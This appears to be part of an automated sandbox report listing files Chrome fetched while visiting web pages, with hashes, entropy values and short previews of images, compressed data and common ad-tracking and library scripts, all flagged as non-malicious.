                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......3.....u......IDATx^......+1.....H.YT...CEe..|....#......DvT....qy1..kpI.$.h"1n.0...#.q.%....N...8uO...;.u..~..N..{..U.NUcJ..4E....h....i3..c.>...q..+......<n.h.a.3.S0.........X.......:y.(.......~...K..l..m.c.RR?o....A7\..f.ly..$-....&..-.J...Fa}F...e..=,_...t...L..T..ER(...y.1....%n...ew.WJ.'./..>!..H6..m..,.[6......J.......%..Za.x.}..u..b.#.:.o.~>......5...L..7..%..*.X...=..u.%..........o#...d.~.L.i.s.LZ..g......&.....xgA." .{s..*...a._.......Fr.H..~7..V.=vFE...k...+.../.Z.(...^...hY\:ue.=..;.b..w._X..m.V.I....kO.[.Gq........3.=.A....B.o....4+....oh.%,.G....4.+?..j6...~s.....o.n..{Q....}.{.j....n.......|/..4.+?..-,z,..iUy..Qt...d.5.<ju...).b..~.$.........-...l......-.{.....K...$....d.,.........,S-.[...by69.m.U.....G,.%u..o.....4....T...{.....[n.tU~B....7~.'...OL>..|...q..K..X.#b.B.../........L....@..v.....2...}.z.Z..5.&{Hg8.'.......X...!..-.X&...~...5.N.fM.d........O.V../.....a....0......k=._..sAC.[R.e.<.=.\
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (63965), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):63965
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.415839533934785
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:Sa+O7y8yVCWTXTnkbnErQJe+ISMnfI2gpyrJZa6Dx76H1W7XAW2vr3:Sa+ZCkDiEcJe+ISMnxJjDy1EXAj3
                                                                                                                                                                                                                                                                                                                                                                          MD5:2AFD7A7856345176E1C9C378191AE043
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5E2C23320DDC06A4B00BBD81DC58D9D6A897401D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3029A59A3EB78E1675C02962B4C2EFA72C770B73C3336F95F14B4C73B7465397
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:139CB12A253E234E52C8B0E3F3FD6932E04250D2B8818EDC525939546B06852E26B17C1269AD5967FA2B9DCB965976C79EA9090168B04A457E769E2CC9457158
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== 'undefined' && typeof console.log !== 'undefined' && typeof document.createElement !== 'undefined' ); }; if(!lotameIsCompatible()){ if(console && console.error){ console.error('Lotame: This browser does not meet the minimum requirements.'); } } else { function lt3825_aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function lt3825_a(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:lt3825_aa(a)}}var lt3825_ba="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},lt3825_b; if("function"==typeof Object.setPrototypeOf)lt3825_b=Object.setPrototypeOf;else{var lt3825_c;a:{var lt3825_ca={Vb:!0},lt3825_da={};try{lt38
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text, with very long lines (2015)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):40506
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.518302745738682
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:8xMuZ04icWJj1GV2eYcZOYnHKoOFAVUagrLG9JQcgNYTrfgUYyzkoDBRW0sbh3RQ:A+ObYcAYb2Zhd3ZE3
                                                                                                                                                                                                                                                                                                                                                                          MD5:81B0F44C9A10776A781E4CF1119DFCD1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:69285BE8F24E9FFC9B172DEE6530086E583E9A90
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:9F4920BA1903B6827C8E4E00C51ACB76A5B2F49BDDAA35B09D8578CFDFE29D8C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0DDCCDB29D6C029F28818FCECFD6BEA02A77A556E53C417D69F11A496C0D167E7A3E2597B9746BBB57511A191B9AD54BCB011FB6F6059A74DAA8E6AFE579B52
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/mysidia/81b0f44c9a10776a781e4cf1119dfcd1.js?tag=addon/mysidia_one_click_handler_one_afma
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;const aa=(new Date("2024-01-01T00:00:00Z")).getTime();.function ba(a){a=a.s;const b=encodeURIComponent;let c="";a.platform&&(c+="&uap="+b(a.platform));a.platformVersion&&(c+="&uapv="+b(a.platformVersion));a.uaFullVersion&&(c+="&uafv="+b(a.uaFullVersion));a.architecture&&(c+="&uaa="+b(a.architecture));a.model&&(c+="&uam="+b(a.model));a.bitness&&(c+="&uab="+b(a.bitness));a.fullVersionList&&(c+="&uafvl="+b(a.fullVersionList.map(d=>b(d.brand)+";"+b(d.version)).join("|")));typeof a.wow64!=="undefined"&&(c+="&uaw="+Number(a.wow64));return c}.function ca(a,b){return a.g?a.m.slice(0,a.g.index)+b+a.m.slice(a.g.index):a.m+b}function da(a,b=0){let c="&act=1";b===0?c+="&ri=1":b===1?c+="&ri=24":b===2&&(c+="&ri=25");a.l&&a.s&&(c+=ba(a));a.h&&(c+="&suid="+a.o);return ca(a,c)}function ea(a,b){if(a.l&&a.i){if(b==1)return a.i||""}else if(a.h){if(b==1)return ca(a,"&dct=1&suid="+a.o);if(b==3)re
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 43386
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):12103
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985508379818304
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVc2VhjIJ0STPz03aWagq692yvggkbH:+tjRIm6SoITu3khUTPjI5TI3afb6YmwH
                                                                                                                                                                                                                                                                                                                                                                          MD5:BED9B675380C07EDC84C03D0F362B192
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0FC4DCF8CB37F303985159B5A9348BB9AE5C6397
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3AE25E7FC8C3E9A41A480D9E39BA0E43845FFD78B0529695530925F6575852D9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:25CFA4027E02D6EEFC95202417A02843556BDA5D28685735FFC102F3C63327CFAAF59B9565E3B23F2BC26C0274EFDD0F69CCA8AD9A3A6DCEA4D903722DCE9FB6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32026)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43881
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.106384125828613
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:sYkOuS23jVwcqA5ABQmTNcYcVNGnsYdXAtMUI8BYCQSvbShkb4X6DJ1bfNvj:hDFBQmTNfMR4X6DJ15vj
                                                                                                                                                                                                                                                                                                                                                                          MD5:22F75416148991671E580D8F4D2A2387
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F5071717B9E5E3FE5D3AEF69F9F20ACF753BC1F8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:357452F2A55C999DDD3AFDCBCE2C339D41CF7A01613D9D45FF88A753BB82F21D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1C63A740EF7E48FD55F764ABB597E3AB1C6D2E6573A99A631457A4BF36555A88804924204ABE1CC3D2AA776FA5F0B969E069B41BC188149E1D77066295C75BF0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. _ _ _ _. ___| (_) ___| | __ (_)___./ __| | |/ __| |/ / | / __|.\__ \ | | (__| < _ | \__ \.|___/_|_|\___|_|\_(_)/ |___/. |__/.. Version: 1.9.0. Author: Ken Wheeler. Website: http://kenwheeler.github.io. Docs: http://kenwheeler.github.io/slick. Repo: http://github.com/kenwheeler/slick. Issues: http://github.com/kenwheeler/slick/issues.. */.(function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)})(function(i){"use strict";var e=window.Slick||{};e=function(){function e(e,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(e),appendDots:i(e),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"eas
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 12955
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4675
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.957112634380581
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:oK/gBUvOV6xbI9WVByen2NmOfnUDfuC4+cbGtZu:/kMnYmJmf+ze
                                                                                                                                                                                                                                                                                                                                                                          MD5:CF826C613CA8817220B27EE016010218
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9A2B63FA4508E1C2D57D73826749DBBE3E3D79B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6ECD16D6E4A1F40CC6A62EC9F8672AF0204AFD4EF4B01CAEEB4550706822F039
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F3B9B90963F8FEC9F602139CE53EBEE50D4B3258A34C216DAAEC61ED25D6237CA5E3A24D7471C8F7F34850C953C168242C4EE1C0634F255C81696B50850AF662
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........Z.s.8..W$.....L...aT...;'v.3{W.h]0.Y.P....d...5..^I.&?\....n.....Y)..)........=..d..b"......yV..h.M.L........f......)5...P|^*m..M.15..,RA....3Zo6.j..I..sO.s......y...m.j.....d......_..d.,.OOWw....S1...j).Y.ak!.........&R....t..+....~lVK.f....N.....1:.....`pl......."b.TZ.m...dv{+.jX=.?t.x.xq6g.3.x"&.....S.....'.e.n..'1.._...N.#UqE\..7.e.......8B...Zx...+q....-A..K+d...IQ....z..O0..n.L...@.~.f.d$.}...v.hW.+.7..F....0. ...vj.H.....Z.EL.s^\=.ZX..h......$.[.g....>..W.6.OX..Y...J..k..L..#...l.(.3...c?.dJ..(hPF..*..'...:~.H.c..p....1..5..)..8bi.0...._....*K{.~.vN...M....../|3..'.c.X....'.B.K.....]fZ.!.ff-!..5ca.d....../......5..N....\.e..Q.5>..x_.x.K...2_y<..z.s...s.E.%..n....MP.U......A...s.i7Fi~...@W.....W....FC<..P.0.......}....2........W3....W.g....=}v"l.....?..t...BD;.....\}..........2..e*.x!x=....a...z.*.............:C.5iGYe...L....Tn#.=..`.....tE.,....V...3..v.2.h..4...-xQj....!..y....B....j.j*..\p..[.4n.$.lE.......g*
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9662
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.362647679661637
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:8RCJlIv7hEPKjRYlftXbmOS++HOEyDu+:oCJlIlE6RYlf7F+uBDu+
                                                                                                                                                                                                                                                                                                                                                                          MD5:9FAFB91660F4C2E3052C947C09A9C6A2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5C8F39AB440EE85F74BE231B3D32946BCE8A2D0E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:26462C7913EACE7E031CC620772FDE257B62F1D9AFB200F9FE4CCB102A839EFA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8D30A742F97B27610F0653E4E779A6A9A4566B8B4A9D7E2BE605D0CDE6403ACB48B512D005A1B19DFD950EDED1482ACD0C5FE94521674FE21AA56D0FA9BAC3B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://my7recovery.blogspot.com/favicon.ico
                                                                                                                                                                                                                                                                                                                                                                          Preview:......00.... ..%......(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                          MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://us-u.openx.net/w/1.0/sd?id=537103138&val=e465f6b18ea333341ca87e3d2e8121bb&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):380
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2386619768465055
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:51bu3hb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51bU513QvuHnmVZkGdDJH10D+xc15CZj
                                                                                                                                                                                                                                                                                                                                                                          MD5:99118862043AE2295A3C4C22B3F09FCF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3598E71C538EDBBACFBC7A56B9B805D6B726F5DC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:95A4F0612DCB7047B2C6EFD6D0C9713D65472B792EF24728002870F746670EA9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:DFE7A0C5AAF5DA8BE4AD61F6AA78DFE3F4229D134F9C4B64C800838753D71FBEC77CDD5698A23785AC5F9F2E67F886E53855B0ED204B2B256BDF781254FC41BF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://s4.histats.com/stats/0.php?4525035&@f16&@g1&@h1&@i1&@j1728897152149&@k0&@l1&@mCsh%20Verify&@n0&@ohttps%3A%2F%2Fald.my.id%2F&@q0&@r0&@s0&@ten-US&@u1280&@b1:105209297&@b3:1728897152&@b4:js15_as.js&@b5:-240&@a-_0.2.1&@vhttps%3A%2F%2Fald.my.id%2F&@w
                                                                                                                                                                                                                                                                                                                                                                          Preview:_HST_cntval="#3Vis. today=7130";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):93868
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.372204012865564
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:k5RKUpVgklsdbuLP/l+0fGzA8gmtasgx/c9Rzzi4yff8qeLvHHEjam7rSnmBn9gn:Ee8FbGzA81+xRRi1Z3
                                                                                                                                                                                                                                                                                                                                                                          MD5:DDB84C1587287B2DF08966081EF063BF
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9EB9AC595E9B5544E2DC79FFF7CD2D0B4B5EF71F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:88171413FC76DDA23AB32BAA17B11E4FFF89141C633ECE737852445F1BA6C1BD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0640605A22F437F10521B2D96064E06E4B0A1B96D2E8FB709D6BD593781C72FF8A86D2BFE3090BC4244687E91E94A897C7B132E237D369B2E0DC01083C2EC434
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32026)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):43881
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.106384125828613
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:sYkOuS23jVwcqA5ABQmTNcYcVNGnsYdXAtMUI8BYCQSvbShkb4X6DJ1bfNvj:hDFBQmTNfMR4X6DJ15vj
                                                                                                                                                                                                                                                                                                                                                                          MD5:22F75416148991671E580D8F4D2A2387
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F5071717B9E5E3FE5D3AEF69F9F20ACF753BC1F8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:357452F2A55C999DDD3AFDCBCE2C339D41CF7A01613D9D45FF88A753BB82F21D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1C63A740EF7E48FD55F764ABB597E3AB1C6D2E6573A99A631457A4BF36555A88804924204ABE1CC3D2AA776FA5F0B969E069B41BC188149E1D77066295C75BF0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*. _ _ _ _. ___| (_) ___| | __ (_)___./ __| | |/ __| |/ / | / __|.\__ \ | | (__| < _ | \__ \.|___/_|_|\___|_|\_(_)/ |___/. |__/.. Version: 1.9.0. Author: Ken Wheeler. Website: http://kenwheeler.github.io. Docs: http://kenwheeler.github.io/slick. Repo: http://github.com/kenwheeler/slick. Issues: http://github.com/kenwheeler/slick/issues.. */.(function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)})(function(i){"use strict";var e=window.Slick||{};e=function(){function e(e,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(e),appendDots:i(e),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"eas
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1675)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):90520
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.441118702685365
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:F7YpivWKQFVj8mFyCeoahe0vBJcmwgmsIb/eH:cL+BJcxa
                                                                                                                                                                                                                                                                                                                                                                          MD5:134913A92E99352A5BF756FEFC528FFC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3FBE7B6A052379A3AD5FAE53A7196D5E6FAA60D8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0641409D1C3CDD9D398534537A3E3D0E158460B7C1E4238CBCD3F14D401A4896
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:2CCD8E253104AD4DDF469C90C25C792DFB9073AEBF46A8E4991993FB38910D2662EF448C60FFACDFDAA230AA498B8757F4FE12A19981B0F94FD9CB569BF7595A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:window.__adroll||(function(){function g(){this.pxlstart=(new Date).getTime();this.version="1.0";this.exp=8760;this.eexp=720;this.pv=1E11*Math.random();this.__adc="__ar_v4";this._nad=0;this._lce=null;this._loaded=this._broken=!1;this._url=2E3;this._kwl=300;this._r={};this.cm_urls=[];this._logs=[];this.consent_networks={facebook:"f",linkedin:"linkedin"};this.pixelstart=this.session_time=0;this._init_idb();this._init_floc_trial();for(var a=Array(4),b=0;b<a.length;b++)a[b]=(Math.round(1E11*Math.random()).toString(16)+Array(9).join("0")).substr(0,.8);this._set_global("adroll_sid",a.join(""));this._set_webworker_vars();this._has_global("adroll_adv_id")&&(this.init_pixchk(),this._load_precheck_js(),this.trigger_gtm_consent_event(),this.load_pixel_assistant(),["adroll_adv_id","adroll_pix_id"].forEach(function(a){window.hasOwnProperty(a)&&("string"===typeof window[a]||window[a]instanceof String)&&(window[a]=window[a].replace(/[^A-Z0-9_]/g,""))}));window.adroll=window.adroll||{};window.adroll.id
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):389666
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.182552335516964
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:ENG8ZHMCbS/mgV3B8ILvPptpZ8p7M6oya+MOn4y6Ox5juDEnXrDJc7MsBy/n+TEr:ENG8ZimgZB7GoyVufJLc8QoGN
                                                                                                                                                                                                                                                                                                                                                                          MD5:4711A133DB57DF4A7F67FFE4C32D4E11
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C335F69F0F85D49F193DDEEB23E3E3955D51FB26
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5EB6D784CACE211D13D7D67050F0BFD180698E3389230D8D192EF00B62ED63AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:AFBC774DA55CF7CF39DA0F9712021F09ABC7E7CCFA702FB5159AF565997D7B810D6F20F8DE654BC658D89A2E3CF43BAF80D1F0F28B79832FA5323E6D44A435E2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.youtube.com/s/player/2f238d39/www-player.css
